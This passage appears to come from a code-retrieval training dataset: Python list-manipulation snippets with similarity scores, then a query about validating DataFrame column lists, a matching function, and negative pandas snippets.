List[int]) -> None:\n l,r=0,len(nums)-1\n while l<r:\n if nums[l]==0:\n nums.append(nums.pop(l))\n r-=1\n continue\n l+=1\n return nums", "def moveZeroes(self, nums: [int]) -> None:\n if len(nums) < 2 :\n return\n point = 0\n for fast_point in range(0,len(nums)):\n if nums[fast_point] != 0:\n nums[point],nums[fast_point] = nums[fast_point],nums[point]\n point += 1\n pass\n pass", "def moveZeroes(self, nums: List[int]) -> None:\n ##brute force\n # counts= nums.count(0)\n # while 0 in nums: nums.remove(0)\n # nums+=[0]*counts\n \n ## two pointer (swapping)\n if not nums: return None\n anchor, explore= 0, 0\n while explore <len(nums):\n if nums[explore]!=0 and explore!=anchor:\n temp= nums[anchor]\n nums[anchor]=nums[explore]\n nums[explore]=temp\n if nums[anchor]!= 0:\n anchor+=1\n explore+=1", "def moveZeroes(self, nums: List[int]) -> None:\n i = j = 0\n for i in range(len(nums)):\n if nums[i] != 0:\n nums[j] , nums[i]= nums[i] , nums[j]\n j += 1", "def moveZeroes(self, nums: List[int]) -> None:\n i = j = 0\n N = len(nums)\n while j < N:\n while j < N and nums[j] == 0:\n j += 1\n if j >= N:\n break\n nums[i] = nums[j]\n i += 1\n j += 1\n while i < N:\n nums[i] = 0\n i += 1", "def moveZeroes(self, nums: List[int]) -> None:\n n = len(nums)\n non0 = 0\n p = 0\n while (p < n):\n if nums[p] != 0:\n nums[p], nums[non0] = nums[non0], nums[p]\n non0 +=1\n \n p +=1", "def moveZeroes(self, nums: [int]) -> None:\n length = len(nums)\n i = 0\n ctr = 0\n while i < length:\n if ctr == length - 1:\n break\n if nums[i] == 0:\n nums.append(0)\n nums.pop(i)\n else:\n i += 1\n ctr += 1", "def moveZeroes(self, nums: List[int]) -> None:\n count = 0\n ans = []\n for num in nums:\n if num != 0:\n ans.append(num)\n else:\n count += 1\n for zero in range(count):\n ans.append(0)\n return ans", "def singleNumber2(self, nums):\n hash_table={}\n \n for i in nums:\n try:\n hash_table.pop(i)\n except:\n hash_table[i] = 1\n \n return hash_table.popitem()[0]", "def moveZeroes(self, nums: List[int]) -> None:\n pos =0\n for i in nums:\n if i==0:\n continue\n else:\n nums[pos]=i\n pos+=1\n nums[pos:] = [0] * (len(nums)-pos)", "def moveZeroes(self, nums: 'List[int]') -> 'None':\n\n i = 0\n len_nums = len(nums)\n while i < len_nums:\n if nums[i] == 0:\n nums.append(nums.pop(i))\n len_nums -= 1\n else:\n i += 1", "def fn(nums):\n ans, vals = [], []\n for i, x in enumerate(nums): \n k = bisect_left(vals, x)\n if k == len(vals): vals.append(x)\n else: vals[k] = x\n ans.append(k)\n return ans", "def moveZeroes(self, nums: List[int]) -> None:\n # 循环记录0元素的个数,并且遇到非0元素时候,将非0元素替换到0元素的位置\n # count 记录0元素的个数, i - count实际上是记录了零元素的位置。\n count = 0\n for i in range(len(nums)):\n if nums[i] == 0:\n count += 1\n elif count > 0:\n nums[i - count], nums[i] = nums[i], 0\n return nums", "def _one_pass(nums):\n pattern = [0, 1, 0, -1]\n return [\n int(str(sum(\n v * pattern[(i // n) % len(pattern)]\n for i, v in enumerate(nums, start=1)\n ))[-1])\n for n in range(1, len(nums) + 1)\n ]", "def moveZeroes(self, nums: List[int]) -> None:\n index = 0\n for i in range(len(nums)):\n if nums[i] == 0:\n index += 1\n else:\n nums[i - index] = nums[i]\n\n index0 = len(nums) - index\n while index0 <= len(nums) -1:\n nums[index0] = 0\n index0 +=1", "def permutation(nums):\n list = []\n temp = []\n backtrack(list, temp, nums)\n return list", "def moveZeroes(nums):\n \n zero_count = nums.count(0)\n \n for x in range(zero_count):\n nums.remove(0)\n nums.append(0)", "def moveZeroes(self, nums: List[int]) -> None:\n \n zero_cnt = 0\n for i in range(len(nums)):\n if nums[i] == 0:\n nums.pop(i)\n nums.insert(0, 0)\n zero_cnt += 1\n \n while zero_cnt > 0:\n nums.pop(0)\n nums.append(0)\n zero_cnt -= 1", "def fn(nums):\n if len(nums) == 1: return nums\n return fn(nums[::2]) + fn(nums[1::2])", "def single_number(nums):\n tmp = 0\n for num in nums:\n tmp ^= num\n marker = 1\n while marker & tmp != marker:\n marker <<= 1\n a = 0\n for num in nums:\n if marker & num:\n a ^= num\n b = tmp ^ a\n return [a, b]", "def __init__(self, nums):\n acc = 0\n for i in range(len(self.sumArr)):\n self.sumArr.pop()\n for i in nums:\n acc += i\n self.sumArr.append(acc)\n print self.sumArr", "def moveZeroes(self, nums: List[int]) -> None:\n s = 0\n \n while nums.count(0) > 0:\n nums.remove(0)\n s += 1\n \n for i in range(s):\n nums.append(0)", "def wiggleSort(self, nums: List[int]) -> None:\n newlist=sorted(nums)\n nums[::2]=newlist[:int(len(nums)/2)+len(nums)%2]\n nums[1::2]=newlist[int(len(nums)/2)+len(nums)%2:]", "def moveZeroes(self, nums: List[int]) -> None:\n\n pos = 0\n \n for i in range(len(nums)):\n element = nums[i]\n \n if element != 0:\n nums[pos],nums[i] = nums[i], nums[pos]\n pos +=1", "def sort(self, nums: List[int]) -> None:\n n = len(nums)\n\n # Traverse through th list\n for i in range(n):\n for j in range(n-i-1):\n\n # Swap adjacent elements if they are out of order\n if nums[j] > nums[j+1]:\n nums[j], nums[j+1] = nums[j+1], nums[j]", "def moveZeroes(self, nums: List[int]) -> None:\n N = len(nums)\n l = 0\n r = 0\n while r < N:\n if nums[l] == 0 and nums[r] != 0:\n nums[l], nums[r] = nums[r], nums[l]\n l += 1\n elif nums[r] == 0:\n r += 1\n else:\n l += 1\n r += 1", "def moveZeroes(self, nums: list) -> None:\n# p, q = 0, 1\n# for p in range(len(nums)):\n# if nums[p] == 0:\n# for q in range(p+1, len(nums)):\n# if nums[q] != 0:\n# nums[p], nums[q] = nums[q], nums[p]\n# break\n q = 0\n for p in range(len(nums)):\n if nums[p] != 0:\n nums[q] = nums[p] #直接把非零数塞到前面,从而避免了又一重循环\n q += 1\n for k in range(q, len(nums)):\n nums[k] = 0\n k += 1", "def wiggleSort(self, nums: List[int]) -> None:\n temp = sorted(nums)\n s, t = (len(nums) + 1) >> 1, len(nums)\n for i in range(len(nums)):\n if i & 1 == 0:\n s -= 1\n nums[i] = temp[s]\n else:\n t -= 1\n nums[i] = temp[t]", "def wiggleSort(self, nums: List[int]) -> None:\n for ind in range(len(nums) - 1):\n\n if ind % 2 == 0:\n if nums[ind] > nums[ind + 1]:\n nums[ind], nums[ind + 1] = nums[ind + 1], nums[ind]\n\n else:\n if nums[ind] < nums[ind + 1]:\n nums[ind], nums[ind + 1] = nums[ind + 1], nums[ind]", "def moveZeroes(self, nums: List[int]) -> None:\n count = 0 # Shift count variable\n for i in range(len(nums)):\n if nums[i] == 0:\n count += 1\n else:\n nums[i-count], nums[i] = nums[i], nums[i-count] # Swap the nubmer and zero\n\n return", "def moveZeroes(self, nums) -> None:\n zero_count = 0\n for index, each_data in enumerate(nums):\n if each_data == 0:\n zero_count += 1\n continue\n nums[index - zero_count] = each_data\n start = len(nums) - zero_count\n while start < len(nums):\n nums[start] = 0\n start += 1", "def merge(self, nums1, m, nums2, n):\n nums1.extend([0]*n)\n j=0\n for i in range(len(nums1)):\n if nums2[j]<nums1[i]:\n nums1.remove(0)\n nums1.insert(i,nums2[j])\n j=j+1", "def reset(self):\n return self.nums", "def moveZeroes(self, nums: List[int]) -> None:\n pos=0\n for i in range(len(nums)):\n if(nums[i]!=0):\n nums[pos],nums[i]= nums[i],nums[pos]\n pos+=1", "def merge(self, nums1: List[int], m: int, nums2: List[int], n: int) -> None:\n for i in range(n):\n nums1[m + i] = nums2[i]\n nums1.sort()", "def moveZeroes(nums):\n for i in nums:\n if (i == 0):\n nums.pop(nums.index(i))\n nums.append(i)", "def merge(self, nums1, m, nums2, n):\n n=len(nums1)\n j=0\n for i in range(n):\n if nums2[j]<nums1[i] and nums2[j]<len(nums2):\n nums1.remove(0)\n nums1.insert(i,nums2[j])\n j=j+1\n if nums1[i]==0 and nums2[j]<len(nums2):\n nums1[i]=nums2[j]", "def sort(self, nums: List[int]) -> None:\n\n # Seperates negative and positive integers\n neg, pos = [], []\n for num in nums:\n if num < 0:\n neg.append(-num)\n else:\n pos.append(num)\n\n # Sorts the negative numbers\n self._sort(neg)\n neg.reverse()\n\n # Sorts the positiv numbers\n self._sort(pos)\n \n # Remerges the sorted subarrays back into the original array.\n i = j = k = 0\n while j < len(neg):\n nums[i] = -neg[j]\n j += 1\n i += 1\n\n while k < len(pos):\n nums[i] = pos[k]\n k += 1\n i += 1", "def merge(self, nums1: List[int], m: int, nums2: List[int], n: int) -> None:\n j = 0\n i = 0\n while i < m:\n if j >= n:\n break\n if nums1[i] == 0 and i >= m:\n \n nums1[i:] = nums2[j:]\n break\n else:\n if nums1[i] < nums2[j]:\n i+= 1\n else:\n\n nums1[i:] = [nums2[j]]+nums1[i:-1]\n j+=1\n i+=1\n m+=1", "def reset(self) -> List[int]:\n return self.nums", "def moveZeroes2(self, nums) -> None:\n p1, p2 = 0, 0\n N = len(nums)\n\n while p2 < N:\n while p1 < N and nums[p1] != 0:\n p1 += 1\n\n if p2 <= p1:\n p2 = p1 + 1\n\n if p2 >= N:\n break\n\n if nums[p2] != 0:\n nums[p1], nums[p2] = nums[p2], nums[p1]\n p1 += 1\n p2 += 1\n else:\n p2 += 1", "def merge(self, nums1, m, nums2, n):\n nums1.extend([0]*len(nums2))\n j=0\n for i in range(len(nums2)):\n if nums2[i]<nums1[j]:\n nums1.pop()\n print(nums1)\n nums1.insert(j,nums2[i])\n j=j+1", "def nextPermutation(self, nums: List[int]) -> None:\n pass", "def __init__(self, nums):\n self.sums,tmp =[],0\n for n in nums:\n tmp +=n\n self.sums.append(tmp)", "def reset(self):\n return self.nums", "def nextPermutation(self, nums) -> None:\n\n def helper(a, i):\n while i > 0:\n for j in range(i - 1, a - 1, - 1):\n if nums[j] < nums[i]:\n nums[j], nums[i] = nums[i], nums[j]\n nums[j + 1:] = reversed(nums[j + 1:])\n return\n elif nums[j] == nums[i]:\n helper(j, i - 1)\n i -= 1\n nums.reverse()\n\n helper(0, len(nums) - 1)", "def square_nums(number_list):", "def fn(i):\n if len(nums) == i: return ans.append(stack.copy())\n fn(i+1)\n stack.append(nums[i])\n fn(i+1)\n stack.pop()", "def nextPermutation(self, nums: List[int]) -> None:\n n = len(nums)\n i = n-2\n while i >= 0 and nums[i] >= nums[i+1]:\n i -= 1\n j = n-1\n while j > i and nums[j] <= nums[i]:\n j -= 1\n\n nums[i], nums[j] = nums[j], nums[i]\n # 当nums已经是最大的,那么 i=j=-1\n nums[i+1:] = sorted(nums[i+1:])", "def merge(self, nums1: [int], m: int, nums2: [int], n: int) -> None:\n for i in range(m, len(nums1)):\n del nums1[m]\n for i in range(n, len(nums2)):\n del nums2[n]\n\n nums1 += nums2\n nums1.sort()", "def smallerNumbersThanCurrent(nums: List[int]) -> List[int]:\n i, count = 0, 0\n arr = []\n for j in range(len(nums)):\n if nums[i] > nums[j]:\n count += 1\n arr.append(count)\n return arr", "def moveZeroes(self, nums) -> None:\n nums.sort(key=lambda x : x != 0)\n print(nums)\n\n point = 0\n for index, value in enumerate(nums):\n if value != 0:\n point = index\n break\n\n nums[point:] = list(reversed(nums[point:]))\n print(nums)\n nums.reverse()\n print(nums)", "def moveZeroes(self, nums: List[int]) -> None:\n zeros=0\n for i in range(len(nums)):\n if nums[i]==0:\n zeros+=1\n else:\n nums[i-zeros]=nums[i]\n for i in range(len(nums)-zeros,len(nums)):\n nums[i]=0", "def delete_numbers(n, nums):\n for i in range(len(nums)):\n if nums[i] % n == 0:\n nums[i] = 0", "def moveZeroes(self, nums: List[int]) -> None:\n # Treating the corner case first:\n if len(nums) == 0 or len(nums) == 1:\n return\n # Treating the general cases...\n counter = 0\n for i in range(0, len(nums)):\n if nums[i] == 0:\n counter += 1\n left = 0\n right = 0\n while right < len(nums):\n if nums[left] == 0 and nums[right] == 0:\n right += 1\n elif nums[left] == 0 and nums[right] != 0:\n nums[left] = nums[right]\n left += 1\n right += 1\n elif nums[left] != 0 and nums[right] == 0:\n right += 1\n else:\n nums[left] = nums[right]\n left += 1\n right += 1\n i = -1\n while counter > 0:\n nums[i] = 0\n counter -=1\n i -= 1\n return", "def sort(self, nums: List[int]) -> None:\n n = len(nums)\n for i in range(n):\n\n # Set the lowest to the beginning of the unsorted subarray\n low = i\n for j in range(i+1,n):\n\n # Find the lowest in the unsorted array\n if nums[j] < nums[low]:\n low = j\n \n # Swap the beginning of the unsorted subarray and the lowest.\n # The beginning of the unsorted subarray now becomes the end of the sorted subarray\n nums[i], nums[low] = nums[low], nums[i]", "def merge(self, nums1: List[int], m: int, nums2: List[int], n: int) -> None:\n nums3 = nums1[:m]\n i = 0\n j = 0\n k = 0\n while i < m and j < n:\n if nums3[i] < nums2[j]:\n nums1[k] = nums3[i]\n i += 1\n else:\n nums1[k] = nums2[j]\n j += 1\n k += 1\n \n for v in range(i, m):\n nums1[k] = nums3[v]\n k += 1\n \n for v in range(j, n):\n nums1[k] = nums2[v]\n k += 1", "def moveZeroes(self, nums: List[int]) -> None:\n left = 0\n zero = 0\n right = len(nums) - 1\n while left <= right:\n if nums[left] == 0:\n nums.pop(left)\n nums.append(0)\n right -= 1\n else:\n left += 1", "def nextPermutation(self, nums: list[int]) -> None:\n for i in range(len(nums) - 2, -1, -1):\n if nums[i] < nums[i + 1]: break\n firstGreater = self.findFirstGreater(nums, nums[i], i + 1, len(nums) - 1)\n nums[i], nums[firstGreater] = nums[firstGreater], nums[i]\n nums[i + 1:] = sorted(nums[i + 1:])", "def task4(nums):\n if len(nums) > 1:\n mid = len(nums) // 2\n left = nums[:mid]\n right = nums[mid:]\n\n task4(left)\n task4(right)\n\n i = j = k = 0\n\n while i < len(left) and j < len(right):\n if left[i] < right[j]:\n nums[k] = left[i]\n i += 1\n else:\n nums[k] = right[j]\n j += 1\n k += 1\n\n while i < len(left):\n nums[k] = left[i]\n i += 1\n k += 1\n\n while j < len(right):\n nums[k] = right[j]\n j += 1\n k += 1\n\n return nums", "def moveZeroes(self, nums: List[int]) -> None:\n count=0\n i=0\n while i<len(nums)-count:\n if nums[i]==0: \n count+=1 \n x = i\n y = x+1\n while y <= len(nums) - count:\n nums[x] = nums[y]\n x = y\n y = y+1\n \n nums[len(nums) - count] = 0\n else:\n i = i+1 \n \n print(nums)", "def merge1(self, nums1, m, nums2, n): \n nums1[:m].extend(nums2[:n]) # 此方法改变了nums1的指向,无效\n # extend没改变指向,但是切片改了 \n nums1[:m] + nums2[:n] # 此方法改变了nums1的指向,无效\n # +号改变了指向\n\n nums1.sort()", "def __init__(self, nums):\n d = [0] if nums else []\n for i in xrange(len(nums)):\n d.append(d[i] + nums[i])\n self.d = d", "def single_number(self, nums: List[int]) -> int:\n if not nums:\n return False\n if len(nums) == 1:\n return nums[0]\n\n visited = set()\n\n for i in nums:\n if i not in visited:\n visited.add(i)\n else:\n visited.remove(i)\n\n return visited.pop()" ]
[ "0.70469916", "0.67161703", "0.66934896", "0.6586775", "0.6501143", "0.6482345", "0.6442288", "0.6407945", "0.6376896", "0.6372343", "0.63671577", "0.6365932", "0.63512594", "0.6328759", "0.6298402", "0.62855035", "0.62671727", "0.62472045", "0.62221444", "0.6193869", "0.6188269", "0.6184157", "0.61814266", "0.6180073", "0.6167664", "0.6158324", "0.6148441", "0.61476713", "0.613699", "0.6119307", "0.61044604", "0.60979587", "0.6087138", "0.60849226", "0.60818934", "0.6079748", "0.607389", "0.6066264", "0.6053259", "0.6053041", "0.6046262", "0.60457736", "0.60294896", "0.6022872", "0.60060567", "0.59951115", "0.59945714", "0.5977443", "0.596527", "0.5964904", "0.59526557", "0.5948315", "0.5936405", "0.59317774", "0.5928145", "0.592811", "0.59255713", "0.59133506", "0.591277", "0.59082997", "0.59076744", "0.59042895", "0.590009", "0.5897842", "0.58946174", "0.58878344", "0.58807635", "0.587345", "0.5870372", "0.5865296", "0.5863181", "0.58609647", "0.5850446", "0.5843022", "0.5833699", "0.581921", "0.5814978", "0.5814781", "0.5811194", "0.5795042", "0.5785132", "0.5777276", "0.5764196", "0.57611984", "0.5755437", "0.5752843", "0.57499003", "0.5747163", "0.57464033", "0.57400894", "0.5727857", "0.5726958", "0.5722932", "0.57216763", "0.5717795", "0.5711458", "0.57025313", "0.56988806", "0.5677013", "0.5675979", "0.56753594" ]
0.0
-1
check that columns_lst is tbset of self.df.columns.names
def validate_col_lst(self, df, columns_lst): if columns_lst == []: raise ValueError("column_lst is empty") col_set = set(columns_lst) df_col_set = set(list(df)) if col_set - df_col_set != set(): msg = "col_lst has columns name that does not exists in the DataFrame columns:{}".format( str(col_set - df_col_set)) print(msg) raise ValueError(msg) return True
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def verify_columns_in_dataframe(df, columns):\n\n if not isinstance(columns, list):\n columns = [columns]\n return set(columns).issubset(df.columns)", "def _check_columns(df: pd.DataFrame, names: typing.Sequence[str]) -> None:\n for expected in names:\n if expected not in df.columns:\n raise ValueError(f\"'{expected}' column not found in input\")\n return", "def check_columns_in_dataframe(df: pd.DataFrame, columns: Tuple[str]) -> None:\n\n for col in columns:\n if col not in df.columns:\n raise ValueError(f\"Column {col} is not in the dataframe.\")", "def _validate_columns(self, names):\n if not is_list_like(names):\n raise ValueError(\"Columns should be list-like\")\n\n if len(set(names)) != len(names):\n raise ValueError(\"Duplicate column names\")\n\n if self._data and len(names) != len(self._data[0]):\n raise ValueError(\"Invalid columns length\")", "def checkcolumnstest(chosen_columns, chosen_df):\n if not all([item in chosen_columns for item in chosen_df.columns]):\n raise ValueError('Columns do not match')", "def get_needed_columns(df, list_of_columns):\n return df[list_of_columns]", "def cols_valid(self,\n df: pd.DataFrame,\n req_cols: set) -> bool:\n missing_cols = req_cols.difference(df.columns)\n\n if len(missing_cols) > 0:\n logging.error(f\"{missing_cols} columns required but missing\")\n return False\n\n return True", "def __checkcolumns(self, lista: List[str]) -> True:\r\n\r\n if isinstance(lista, list) is False:\r\n raise TypeError(f\"{lista} has to be a list.\")\r\n if len(lista) != 10:\r\n raise ValueError(f\"{lista} must have 10 columns\")\r\n\r\n errorlista = []\r\n\r\n # Regarding 'self.tiposDisponiveis',\r\n # Layer and Marked happens on the same column.\r\n # if there is 'layer', 'marked' won't show up, and viceversa.\r\n # Therefore 'self.tiposDisponiveis' is a list with 11 elements. While 'lista' is a list with 10 elements.\r\n\r\n for _ in lista:\r\n # searching for 'Layer'\r\n if self.tiposDisponiveis[0].lower() == _.lower():\r\n break\r\n else:\r\n # if 'Layer' wasn't found, searching for 'Marked'\r\n for _ in lista:\r\n if self.tiposDisponiveis[1].lower() == _.lower():\r\n break\r\n else:\r\n # If none of the two are present on the line, add to the error list\r\n errorlista.append(\"Layer Or Marked\")\r\n \r\n # repeat the search for all the remaining required values\"\"\"\r\n for _ in range(2, len(self.tiposDisponiveis)-1):\r\n for x in lista:\r\n if x.lower() == self.tiposDisponiveis[_].lower():\r\n break\r\n else:\r\n # Didn't find this column in the list\r\n errorlista.append(f\"{self.tiposDisponiveis[_]}\")\r\n\r\n # Raising the errors, if any occurred.\r\n if len(errorlista) > 0:\r\n raise ValueError(f\"{errorlista} <- These columns are missing from format.\")\r\n\r\n # Last column has to be 'Text'\r\n if lista[9].lower() != self.tiposDisponiveis[10].lower():\r\n raise ValueError(f\"{lista[9]} last element has to be 'Text'.\")\r\n \r\n return True", "def _check_columns_with_table(table: Table, columns: Sequence[str]) -> Optional[bool]:\n for column in columns:\n if column not in table.c.keys():\n raise TypeError(f\"Specified column {column} did not exist on table {table}\")\n return True", "def __column_intersect(df, list_):\n return set(list_).intersection(set(df.columns.tolist()))", "def _dataframe_column_check(df: DataFrame, compulsory_columns: Sequence) -> None:\n if not set(compulsory_columns).issubset(df.columns):\n diff = set(compulsory_columns).difference(df.columns)\n msg = (\n \"The following compulsory column(s) are missing from the \"\n f\"DataFrame: {diff}\"\n )\n raise ValueError(msg)", "def check_col(self):\n return (set(map(lambda x: x.lower(),\n self.config['dtypes'])) -\n set(self.metadata.name.values))", "def _check_columns(\n schema_errors: set[str],\n stored: Mapping,\n expected: Mapping,\n columns: Iterable[str],\n table_name: str,\n supports: str,\n) -> None:\n for column in columns:\n if stored[column] == expected[column]:\n continue\n schema_errors.add(f\"{table_name}.{supports}\")\n _LOGGER.error(\n \"Column %s in database table %s does not support %s (stored=%s != expected=%s)\",\n column,\n table_name,\n supports,\n stored[column],\n expected[column],\n )", "def _check_missing_columns(self, df: pd.DataFrame) -> None:\n if any([c not in df.columns for c in REQUIRED_COLUMNS]):\n raise ValueError(\"Missing columns in dataset.\"\n f\"Columns: {df.columns}\"\n f\"Required: {REQUIRED_COLUMNS}\")", "def check_base_fields(df,base_fields):\n emp_list = []\n for item in base_fields:\n if item not in list(df.columns):\n emp_list.append(item)\n\n return emp_list", "def _check_headers(cursor, headers):\n all_columns = set(chain.from_iterable(_columns(cursor, table) for table in DATA_TABLES))\n for header in headers:\n if header not in all_columns:\n raise ValueError('column {} not recognized'.format(header))", "def has_columns(df, columns):\n result = True\n for column in columns:\n if column not in df.columns:\n print(\"Missing column: {} in DataFrame\".format(column))\n result = False\n\n return result", "def get_columns_for(self, column_names, row, dbrow=None):\n if dbrow:\n candidates = filter(lambda col: col not in self.insert_only_fields, column_names)\n else:\n candidates = column_names\n\n return set(candidates).intersection(row._fields)", "def _assert_columns_exist(self, columns):\n if not nonstringiter(columns):\n columns = (columns,)\n self_cols = self.columns()\n is_missing = lambda col: col not in self_cols\n missing = [c for c in columns if is_missing(c)]\n if missing:\n missing = ', '.join(repr(x) for x in missing)\n msg = '{0} not in {1}'.format(missing, self.__repr__())\n raise LookupError(msg)", "def check_dataframe_columns(df):\r\n if len(set(df.columns).intersection(\r\n set([constants.CASE_CONCEPT_NAME, xes_constants.DEFAULT_NAME_KEY,\r\n xes_constants.DEFAULT_TIMESTAMP_KEY]))) < 3:\r\n raise Exception(\r\n \"please format your dataframe accordingly! df = pm4py.format_dataframe(df, case_id='<name of the case ID column>', activity_key='<name of the activity column>', timestamp_key='<name of the timestamp column>')\")", "def verify_columns_in_dataset(self, columns):\n all_cols = self.train.columns\n for col in columns:\n if not col in all_cols:\n raise KeyError(\"column '%s' not in dataset\" % col)", "def check_column(self, columns):\n for i in columns:\n if i.name == self.name:\n raise ColumnNameAlreadyInTableException(f'Column \"{self.name}\" is already in the table!')\n return True", "def _validate_optional_columns(data, optional_columns: Iterable[str]) -> List[str]:\n return [col for col in optional_columns if col in data.columns]", "def is_cols_valid(bd):\n for col in cols:\n seen = []\n for num in nums:\n if bd[col[num]] == \" \":\n continue\n elif bd[col[num]] not in seen:\n seen += [bd[col[num]]]\n else:\n return False\n else:\n continue\n return True", "def check_ingress_required_columns(self, col_names):\n if not set(col_names).issuperset(REQUIRED_COLUMNS):\n if not set(col_names).issuperset(REQUIRED_ALT_COLUMNS):\n missing_columns = [x for x in REQUIRED_ALT_COLUMNS if x not in col_names]\n return missing_columns\n return None", "def verify_columns_in_dataset(self, columns):\n all_cols = self.dataset.columns\n for col in columns:\n if not col in all_cols:\n raise KeyError(\"column '%s' not in dataset\" % col)", "def mpl_args_to_meta_cols(df, **kwargs):\n cols = set()\n for arg, value in kwargs.items():\n if is_str(value) and value in df.meta.columns:\n cols.add(value)\n return list(cols)", "def _selected_columns(self):\n selected_columns = set()\n for feature in self.features:\n columns = feature[0]\n if isinstance(columns, list):\n selected_columns = selected_columns.union(set(columns))\n else:\n selected_columns.add(columns)\n return selected_columns", "def get_columns(hdu, columns):\n if columns is not None:\n columns = columns.split(',')\n columns = [c.lower() for c in columns]\n else:\n columns = hdu.get_colnames()\n\n return columns", "def test_columns_str_error(self):\n\n df = d.create_df_1()\n\n x = BaseTransformer(columns=None)\n\n x.columns = \"a\"\n\n with pytest.raises(ValueError):\n\n x.columns_check(X=df)", "def column_names(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"column_names\")", "def check_null_columns(spark, df, cols):\n null_cols_list = []\n # this assumes the col list matches the original schema\n # df = df.toDF(*cols)\n try:\n df = df.select(*cols)\n col_null_count = df.select([F.count(F.when(F.isnan(col) | F.col(col).isNull(), col)).alias(col) for col in cols]).toPandas().to_dict()\n null_cols_list = [k for k, v in col_null_count.items() if v[0] > 0]\n except Exception as e:\n logger.error('Probably and invalid column(s) was passed...')\n return ['failed']\n return null_cols_list", "def get_all_columns(self):\n df = self.get_prep_data()\n col = [c for c in df.columns if c not in ['target', 'idd', 'ft_data_dt']]\n return col", "def areAllFieldsIncluded(ldata, columns):\n\treturn list(range(len(ldata))) == columns", "def validate_columns(self, fieldnames, dao):\n unstored_columns = ['blank']\n expected_columns = dao.model_type.__table__.columns.keys() + unstored_columns\n for column_name in fieldnames:\n if column_name not in expected_columns:\n raise AttributeError(f\"{self.file_path}: {column_name} column mismatch for \"\n f\"expected file type: {self.file_type.name}\")", "def columns(self):\n return set(self.native_schema)", "def check_cols_methane(name):\n return True if name in ['SampleDay', 'SampleHour', 'Decimal Year',\n 'Peak Area 1', 'Peak Area 2', 'Run median', 'Daily Median'] else False", "def get_all_columns_name(input_glob):\n reader = tf.python_io.TableReader(input_glob,\n selected_cols=\"\",\n excluded_cols=\"\",\n slice_id=0,\n slice_count=1,\n num_threads=0,\n capacity=0)\n schemas = reader.get_schema()\n return set([col_name for col_name, _, _ in schemas])", "def set_check_columns(self):\n # changed to: get column family from indexer\n extr_prefix_base_column_name = self.indexer.extrcf + \":\" + self.extr_prefix\n extr_check_column = extr_prefix_base_column_name + \"_processed\"\n # Need to be build from extraction type and extraction input + \"_batchid\"\n self.batch_check_column = extr_prefix_base_column_name + \"_updateid\"\n self.check_columns = [extr_check_column, self.batch_check_column]\n #print(self.check_columns)", "def validate_column_names(self, cols):\n self.stdout.write('Verifying CSV header')\n csv_cols = set(cols)\n if self.required_csv_columns <= csv_cols:\n return True\n else:\n missing_cols = set(self.required_csv_columns).difference(csv_cols)\n raise ValidationError(\n \"These columns '{0}' are required, but missing in the CSV \"\n \"file.\".format(\n ', '.join(missing_cols)\n )\n )", "def get_feature_columns(all_cols):\n return [col for col in all_cols if col not in get_non_feature_columns()]", "def _columns(cls, schema: dsl.Source.Schema) -> typing.Sequence[str]:\n return tuple(f.name for f in schema)", "def verify(self):\n for col in self.columns:\n if col not in self.table_obj.columns.keys():\n raise Exception('{} column not found in {}'.format(\n col, self.table_obj))", "def test_get_column_names(self):\n table = 'test_table_cols'\n columns = ['col1', 'col2', 'col3']\n\n with self.dbh.table_recreate(table, columns, 'integer'):\n try:\n res = self.dbh.get_column_names(table)\n except Exception:\n self.dbh.rollback()\n raise\n\n self.assertEqual(res, columns)", "def _cols_if_none(X, self_cols):\n return X.columns.tolist() if not self_cols else self_cols", "def remove_columns(lst):\n cols_rem = ['yearID','Team','lgID','Name','X','playerID','pops']\n\n for item in cols_rem:\n if item in lst:\n lst.remove(item)\n\n return(lst)", "def dropped_column_name_list(self):\n column_list = []\n new_tbl_columns = [col.name for col in self._new_table.column_list]\n for col in self._old_table.column_list:\n if col.name not in new_tbl_columns:\n column_list.append(col.name)\n return column_list", "def check_df_col(df, column, name=None):\n if column is not None:\n\n if type(column) != list:\n\n column = [column]\n\n for col in column:\n if name is None:\n error_message = f\"The value '{col}' is not present in any of the columns of your DataFrame.\"\n else:\n error_message = f\"Your {name} value '{col}' is not present in any of the columns of your DataFrame.\"\n error_message += \"\\nYou may be looking for:\\n \" + str(list(df.columns))\n\n assert col in df.columns, error_message", "def _check_required_columns(self, param_df, var_name='param_mean'):\n\n if param_df is None:\n return pd.DataFrame()\n\n try:\n if param_df.shape[0] == 0:\n return pd.DataFrame(columns=list(set(self.required_columns[var_name])|set(param_df.columns)))\n\n if self.required_columns[var_name] - set(param_df.columns) == set([]): # df has required cols.\n return param_df\n else:\n note = \"'{}' must be a pd.DataFrame with the following column names: \".format(var_name) + \\\n _list_the_errors(self.required_columns[var_name] - set(param_df.columns)) + \".\"\n raise ValueError(note)\n except KeyError:\n raise KeyError(\"'{}' is not supported\".format(var_name))", "def _check_features_df(df, features):\n # check columns\n if not set(features).issubset(df.columns):\n raise ValueError(\"The dataframe does not seem to have the right \"\n \"features. {0} instead of {1}\"\n .format(df.columns, features))\n\n return", "def validate(self):\n super().validate()\n frame = getattr(self, 'frame', None)\n if frame is None:\n raise ValueError('Missing columns %s since no frame' % ', '.join(\n self.required_cols))\n cols = set(list(self.frame))\n missing = sorted(self.required_cols - cols)\n if missing:\n raise ValueError('Missing columns: [%s]' % ', '.join(missing))", "def columns_names(self):\r\n return self._columns_names", "def _init_colnames(self):\n\n for name in (\"xaxes\", \"yaxes\", \"hist\", \"chist\"):\n val = getattr(self, name, None)\n if val is not None:\n if val:\n # Convert list of regular expressions into list of names.\n colnames = self._refres.find_colnames(getattr(self, name))\n else:\n colnames = []\n setattr(self, name, colnames)\n else:\n # Set the default values.\n colnames = iter(self._refdefs.info)\n col1 = next(colnames)\n col2 = next(colnames)\n\n if name != \"yaxes\":\n setattr(self, name, [col1])\n else:\n setattr(self, name, [col2])\n\n # At this point we've got the list of column names based on the first test result. But if\n # there are multiple test results, we should find the largest common subset, in case other\n # test results are missing some of the columns present in the first (reference) test result.\n for name in (\"xaxes\", \"yaxes\", \"hist\", \"chist\"):\n intersection = set(getattr(self, name))\n for res in self.rsts:\n intersection = intersection & res.colnames_set\n colnames = []\n for colname in getattr(self, name):\n if colname in intersection:\n colnames.append(colname)\n else:\n _LOG.warning(\"dropping column '%s' from '%s' because it is not present in one \"\n \"of the results\", colname, name)\n setattr(self, name, colnames)\n\n # Verify that we have at least one X-column and Y-column.\n if not self.xaxes or not self.yaxes:\n if not 